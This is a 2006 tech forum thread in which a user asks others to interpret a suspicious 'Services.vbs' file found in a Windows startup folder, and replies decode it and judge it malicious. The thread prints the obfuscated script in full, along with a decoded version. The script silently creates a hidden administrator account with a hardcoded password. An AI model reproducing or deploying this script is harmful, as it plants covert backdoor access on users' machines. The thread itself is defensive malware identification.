TechSpot

VBS expert interpret this script please.

By Vigilante
Jun 11, 2006
  1. I have the basic idea of what this is doing. But I'm wondering if someone can put this in plain English and tell me if it might be bad, or what it looks like to you.

    The file is called "Services.vbs" and ended up in someone's startup, as in, the start menu startup. And it's not a shortcut, but the actual script is IN this startup folder.

    Here is the code in the script:

    Code:
    set wshshell=createobject ("wsc"&"ript.shell" ) 
    a=wshshell.run ("cmd.exe /c n"&"et u"&"ser IUSR_D"&"EBUG zf,@"&"yjk515 /a"&"dd",0) 
    b=wshshell.run ("cmd.exe /c n"&"et loca"&"lgroup Admin"&"istrators IUSR_"&"DEBUG /a"&"dd",0) 
    
    This might be a part of .NET framework, or perhaps a Microsoft Beta program, or their new "Express" programming tools. I don't know, but it appeared and I've got mixed feelings about it. What do you think?
     
  2. lewekleonek

    lewekleonek TS Rookie Posts: 55

    The script adds user IUSR_DEBUG; then it ads the user to local Administrators group. You don't want to run this one for no reason, unless you know exactly what this acount is used for.
     
  3. Vigilante

    Vigilante TechSpot Paladin Topic Starter Posts: 1,666

    I did a google for "IUSR_DEBUG" and didn't turn up anything.

    What's odd is why the script writer needs this to be in startup? Why would they want to add a user to admins on every boot? Wouldn't once be just as good?

    However, I'm still thinking this was installed as part of some, perhaps debugging tool or program. But waiting to see if anybody else has run across this script before.

    Also I find it strange that they mix in loads of "&" all over the place, which makes it more confusing to read. If it was legit, clear written code would have been better I think? Or is there a reason to split all the strings like that?
    thx
     
  4. alidabiri

    alidabiri TS Rookie Posts: 441

    You're right vigil,
    this script smells like unrefrigrated fish.
    set wshshell=createobject ("wsc"&"ript.shell" )
    a=wshshell.run ("cmd.exe /c n"&"et u"&"ser IUSR_D"&"EBUG zf,@"&"yjk515 /a"&"dd",0)
    b=wshshell.run ("cmd.exe /c n"&"et loca"&"lgroup Admin"&"istrators IUSR_"&"DEBUG /a"&"dd",0)
    it translates to this:
    set wshshell=createobject("wscript.shell")
    a=wshshell.run("cmd.exe /c net user IUSR_DEBUG zf,@yjk515 /add,0)
    b=wshehell.run("cmd.exe /c net localgroup Administrators IUSR_DEBUG /add,0)

    (this script adds users to admin group, which is very dangerous).
     
Topic Status:
Not open for further replies.

Similar Topics

Add New Comment

You need to be a member to leave a comment. Join thousands of tech enthusiasts and participate.
TechSpot Account You may also...